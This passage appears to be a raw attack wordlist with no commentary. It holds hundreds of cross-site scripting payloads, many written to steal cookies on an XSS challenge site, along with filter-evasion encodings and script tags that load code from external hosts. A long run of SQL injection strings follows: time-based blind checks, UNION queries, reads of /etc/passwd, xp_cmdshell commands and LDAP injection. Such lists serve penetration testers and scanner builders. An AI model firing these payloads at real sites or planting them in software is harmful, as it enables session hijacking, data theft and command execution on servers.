ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>\n<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>\n<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>\n<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>\n<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22);  xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{   var c;   if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) )    alert(c[1]); }catch(e){} };  xdr.send(); </script>\n<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() {    return document.cookie }}); alert(Safe.get());</script>\n<script>alert(document.head.innerHTML.substr(146,20));</script>\n<script>alert(document.head.childNodes[3].text)</script>\n<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>\n<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>\n<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%22)};document.body.appendChild(x);</script>\n<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\\/script>%22)};document.body.appendChild(x);</script>\n<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>\n<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>\n<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click';  document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>\n<script>  (function (o) {   function exploit(x) {    if (x !== null)     alert('User cookie is ' %2B x);    else     console.log('fail');   }      o.onclick = function (e) {    e.__defineGetter__('isTrusted', function () { return true; });    exploit(Safe.get());   };      var e = document.createEvent('MouseEvent');   e.initEvent('click', true, true);   o.dispatchEvent(e);  })(document.getElementById('safe123')); </script>\n<iframe src=/ onload=eval(unescape(this.name.replace(/\\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>\n<script>     function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> \n<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #\n<script>  function foo(elem, doc, text) {   elem.onclick = function (e) {    e.__defineGetter__(text[0], function () { return true })    alert(Safe.get());   };      var event = doc.createEvent(text[1]);   event.initEvent(text[2], true, true);   elem.dispatchEvent(event);  } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # \n<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#\n<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#\n<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23\n<script for=document event=onreadystatechange>getElementById('safe123').click()</script>\n<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>\n<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>\n<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#\n<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\\/script%26gt;\\%26quot;%26quot;) autofocus></textarea>\n<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>\n<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>\n<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E\n<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>\n<a target=\"x\" href=\"xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E\n<a target=\"x\" href=\"xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>\n<a target=\"x\" href=\"xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>\n<a target=\"x\" href=\"xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\nGarethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>\n<a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>\n<div onmouseover='alert&lpar;1&rpar;'>DIV</div>\n<iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">\n<a href=\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\">X</a>\n<embed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\"> ?\n<object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">?\n<var onmouseover=\"prompt(1)\">On Mouse Over</var>?\n<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>\n<img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">\n<%<!--'%><script>alert(1);</script -->\n<script src=\"data:text/javascript,alert(1)\"></script>\n<iframe/src \\/\\/onload = prompt(1)\n<iframe/onreadystatechange=alert(1)\n<svg/onload=alert(1)\n<input value=<><iframe/src=javascript:confirm(1)\n<input type=\"text\" value=``<div/onmouseover='alert(1)'>X</div>\nhttp://www.<script>alert(1)</script .com\n<iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?\n<svg><script ?>alert(1)\n<iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\n<img src=`xx:xx`onerror=alert(1)>\n<object type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"></object>\n<meta http-equiv=\"refresh\" content=\"0;javascript&colon;alert(1)\"/>?\n<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n<embed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always>?\n<svg contentScriptType=text/vbs><script>MsgBox+1\n<a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a\n<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>\n<script>~'\\u0061' ;  \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073.  \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+\n<script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F\n<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script ????????????\n<object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>\n<script>+-+-1-+-+alert(1)</script>\n<body/onload=&lt;!--&gt;&#10alert(1)>\n<script itworksinallbrowsers>/*<script* */alert(1)</script ?\n<img src ?itworksonchrome?\\/onerror = alert(1)???\n<svg><script>//&NewLine;confirm(1);</script </svg>\n<svg><script onlypossibleinopera:-)> alert(1)\n<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\n<script x> alert(1) </script 1=2\n<div/onmouseover='alert(1)'> style=\"x:\">\n<--`<img/src=` onerror=alert(1)> --!>\n<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?\n<div  style=\"position:absolute;top:0;left:0;width:100%;height:100%\"  onmouseover=\"prompt(1)\" onclick=\"alert(1)\">x</button>?\n\"><img src=x onerror=window.open('https://www.google.com/');>\n<form><button formaction=javascript&colon;alert(1)>CLICKME\n<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?\n<iframe  src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>\n<a  href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click  Me</a>\n\"><img src=x onerror=prompt(1);>\nmediate 'sel' || 'ect us' || 'er'\nbenchmark(10000000,MD5(1))#\nupdate\n\";waitfor delay '0:0:__TIME__'--\n1) or pg_sleep(__TIME__)--\n||(elt(-3+5,bin(15),ord(10),hex(char(45))))\n\"hi\"\") or (\"\"a\"\"=\"\"a\"\ndelete\nlike\n\" or sleep(__TIME__)#\npg_sleep(__TIME__)--\n*(|(objectclass=*))\ndeclare @q nvarchar (200) 0x730065006c00650063 ...\n or 0=0 #\ninsert\n1) or sleep(__TIME__)#\n) or ('a'='a\n; exec xp_regread\n*|\n@var select @var as var into temp end --\n1)) or benchmark(10000000,MD5(1))#\nasc\n(||6)\n\"a\"\" or 3=3--\"\n\" or benchmark(10000000,MD5(1))#\n# from wapiti\n or 0=0 --\n1 waitfor delay '0:0:10'--\n or 'a'='a\nhi or 1=1 --\"\nor a = a\n UNION ALL SELECT\n) or sleep(__TIME__)='\n)) or benchmark(10000000,MD5(1))#\nhi' or 'a'='a\n0\n21 %\nlimit\n or 1=1\n or 2 > 1\n\")) or benchmark(10000000,MD5(1))#\nPRINT\nhi') or ('a'='a\n or 3=3\n));waitfor delay '0:0:__TIME__'--\na' waitfor delay '0:0:10'--\n1;(load_file(char(47,101,116,99,47,112,97,115, ...\nor%201=1\n1 or sleep(__TIME__)#\nor 1=1\n and 1 in (select var from temp)--\n or '7659'='7659\n or 'text' = n'text'\n --\n or 1=1 or ''='\ndeclare @s varchar (200) select @s = 0x73656c6 ...\nexec xp\n; exec master..xp_cmdshell 'ping 172.10.1.255'--\n3.10E+17\n\" or pg_sleep(__TIME__)--\nx' AND email IS NULL; --\n&\nadmin' or '\n or 'unusual' = 'unusual'\n//\ntruncate\n1) or benchmark(10000000,MD5(1))#\n\\x27UNION SELECT\ndeclare @s varchar(200) select @s = 0x77616974 ...\ntz_offset\nsqlvuln\n\"));waitfor delay '0:0:__TIME__'--\n||6\nor%201=1 --\n%2A%28%7C%28objectclass%3D%2A%29%29\nor a=a\n) union select * from information_schema.tables;\nPRINT @@variable\nor isNULL(1/0) /*\n26 %\n\" or \"a\"=\"a\n(sqlvuln)\nx' AND members.email IS NULL; --\n or 1=1--\n and 1=( if((load_file(char(110,46,101,120,11 ...\n0x770061006900740066006F0072002000640065006C00 ...\n%20'sleep%2050'\nas\n1)) or pg_sleep(__TIME__)--\n/**/or/**/1/**/=/**/1\n union all select @@version--\n,@variable\n(sqlattempt2)\n or (EXISTS)\nt'exec master..xp_cmdshell 'nslookup www.googl ...\n%20$(sleep%2050)\n1 or benchmark(10000000,MD5(1))#\n%20or%20''='\n||UTL_HTTP.REQUEST\n or pg_sleep(__TIME__)--\nhi' or 'x'='x';\n\") or sleep(__TIME__)=\"\n or 'whatever' in ('whatever')\n; begin declare @var varchar(8000) set @var=' ...\n union select 1,load_file('/etc/passwd'),1,1,1;\n0x77616974666F722064656C61792027303A303A313027 ...\nexec(@s)\n) or pg_sleep(__TIME__)--\n union select\n or sleep(__TIME__)#\n select * from information_schema.tables--\na' or 1=1--\na' or 'a' = 'a\ndeclare @s varchar(22) select @s =\n or 2 between 1 and 3\n or a=a--\n or '1'='1\n|\n or sleep(__TIME__)='\n or 1 --'\nor 0=0 #\"\nhaving\na'\n\" or isNULL(1/0) /*\ndeclare @s varchar (8000) select @s = 0x73656c ...\nâ or 1=1 --\nchar%4039%41%2b%40SELECT\norder by\nbfilename\n having 1=1--\n) or benchmark(10000000,MD5(1))#\n or username like char(37);\n;waitfor delay '0:0:__TIME__'--\n\" or 1=1--\nx' AND userid IS NULL; --\n*/*\n or 'text' > 't'\n (select top 1\n or benchmark(10000000,MD5(1))#\n\");waitfor delay '0:0:__TIME__'--\na' or 3=3--\n -- &password=\n group by userid having 1=1--\n or ''='\n; exec master..xp_cmdshell\n%20or%20x=x\nselect\n\")) or sleep(__TIME__)=\"\n0x730065006c0065006300740020004000400076006500 ...\nhi' or 1=1 --\n\") or pg_sleep(__TIME__)--\n%20or%20'x'='x\n or 'something' = 'some'+'thing'\nexec sp\n29 %\n(\nÃ½ or 1=1 --\n1 or pg_sleep(__TIME__)--\n0 or 1=1\n) or (a=a\nuni/**/on sel/**/ect\nreplace\n%27%20or%201=1\n)) or pg_sleep(__TIME__)--\n%7C\nx' AND 1=(SELECT COUNT(*) FROM tabname); --\n&apos;%20OR\n; or '1'='1'\ndeclare @q nvarchar (200) select @q = 0x770061 ...\n1 or 1=1\n; exec ('sel' + 'ect us' + 'er')\n23 OR 1=1\n/\nanything' OR 'x'='x\ndeclare @q nvarchar (4000) select @q =\nor 0=0 --\ndesc\n||'6\n)\n1)) or sleep(__TIME__)#\nor 0=0 #\n select name from syscolumns where id = (sele ...\nhi or a=a\n*(|(mail=*))\npassword:*/=1--\ndistinct\n);waitfor delay '0:0:__TIME__'--\nto_timestamp_tz\n\") or benchmark(10000000,MD5(1))#\n UNION SELECT\n%2A%28%7C%28mail%3D%2A%29%29\n+sqlvuln\n or 1=1 /*\n)) or sleep(__TIME__)='\nor 1=1 or \"\"=\n or 1 in (select @@version)--\nsqlvuln;\n union select * from users where login = char ...\nx' or 1=1 or 'x'='y\n28 %\nâ or 3=3 --\n@variable\n or '1'='1'--\n\"a\"\" or 1=1--\"\n//*\n%2A%7C\n\" or 0=0 --\n\")) or pg_sleep(__TIME__)--\n?\n or 1/*\n!\n'\n or a = a\ndeclare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)\ndeclare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) \ndeclare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)\ndeclare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)\n' or 1=1\n\u0018 or 1=1 --\nx' OR full_name LIKE '%Bob%\n'; exec master..xp_cmdshell 'ping 172.10.1.255'--\n'%20or%20''='\n'%20or%20'x'='x\n')%20or%20('x'='x\n' or 0=0 --\n' or 0=0 #\n or 0=0 #\"\n' or 1=1--\n' or '1'='1'--\n' or 1 --'\nor 1=1--\n' or 1=1 or ''='\n or 1=1 or \"\"=\n' or a=a--\n or a=a\n') or ('a'='a\n'hi' or 'x'='x';\nor\nprocedure\nhandler\n' or username like '%\n' or uname like '%\n' or userid like '%\n' or uid like '%\n' or user like '%\n'; exec master..xp_cmdshell\n'; exec xp_regread\nt'exec master..xp_cmdshell 'nslookup www.google.com'--\n--sp_password\n' UNION SELECT\n' UNION ALL SELECT\n' or (EXISTS)\n' (select top 1\n'||UTL_HTTP.REQUEST\n1;SELECT%20*\n<>\"'%;)(&+\n'%20or%201=1\n'sqlattempt1\n%28\n%29\n%26\n%21\n' or ''='\n' or 3=3\n<svg onload=alert(1)>\n\"><svg onload=alert(1)//\n\"onmouseover=alert(1)//\n\"autofocus/onfocus=alert(1)//\n'-alert(1)-'\n'-alert(1)//\n\\'-alert(1)//\n</script><svg onload=alert(1)>\n<x contenteditable onblur=alert(1)>lose focus! \n<x onclick=alert(1)>click this! \n<x oncopy=alert(1)>copy this! \n<x oncontextmenu=alert(1)>right click this! \n<x oncut=alert(1)>copy this! \n<x ondblclick=alert(1)>double click this! \n<x ondrag=alert(1)>drag this! \n<x contenteditable onfocus=alert(1)>focus this! \n<x contenteditable oninput=alert(1)>input here! \n<x contenteditable onkeydown=alert(1)>press any key! \n<x contenteditable onkeypress=alert(1)>press any key! \n<x contenteditable onkeyup=alert(1)>press any key! \n<x onmousedown=alert(1)>click this! \n<x onmousemove=alert(1)>hover this! \n<x onmouseout=alert(1)>hover this! \n<x onmouseover=alert(1)>hover this! \n<x onmouseup=alert(1)>click this! \n<x contenteditable onpaste=alert(1)>paste here!\n<script>alert(1)// \n<script>alert(1)<!–\n<script src=//brutelogic.com.br/1.js> \n<script src=//3334957647/1>\n%3Cx onxxx=alert(1) \n<%78 onxxx=1 \n<x %6Fnxxx=1 \n<x o%6Exxx=1 \n<x on%78xx=1 \n<x onxxx%3D1\n<X onxxx=1 \n<x OnXxx=1 \n<X OnXxx=1 \n<x onxxx=1 onxxx=1\n<x/onxxx=1 \n<x%09onxxx=1 \n<x%0Aonxxx=1 \n<x%0Conxxx=1 \n<x%0Donxxx=1 \n<x%2Fonxxx=1 \n<x 1='1'onxxx=1 \n<x 1=\"1\"onxxx=1\n<x </onxxx=1 \n<x 1=\">\" onxxx=1 \n<http://onxxx%3D1/\n<x onxxx=alert(1) 1='\n<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>\n'onload=alert(1)><svg/1='\n'>alert(1)</script><script/1=' \n*/alert(1)</script><script>/*\n*/alert(1)\">'onload=\"/*<svg/1='\n`-alert(1)\">'onload=\"`<svg/1='\n*/</script>'>alert(1)/*<script/1='\n<script>alert(1)</script> \n<script src=javascript:alert(1)> \n<iframe src=javascript:alert(1)> \n<embed src=javascript:alert(1)> \n<a href=javascript:alert(1)>click \n<math><brute href=javascript:alert(1)>click \n<form action=javascript:alert(1)><input type=submit> \n<isindex action=javascript:alert(1) type=submit value=click> \n<form><button formaction=javascript:alert(1)>click \n<form><input formaction=javascript:alert(1) type=submit value=click> \n<form><input formaction=javascript:alert(1) type=image value=click> \n<form><input formaction=javascript:alert(1) type=image src=SOURCE> \n<isindex formaction=javascript:alert(1) type=submit value=click> \n<object data=javascript:alert(1)> \n<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> \n<svg><script xlink:href=data:,alert(1) /> \n<math><brute xlink:href=javascript:alert(1)>click \n<svg><a 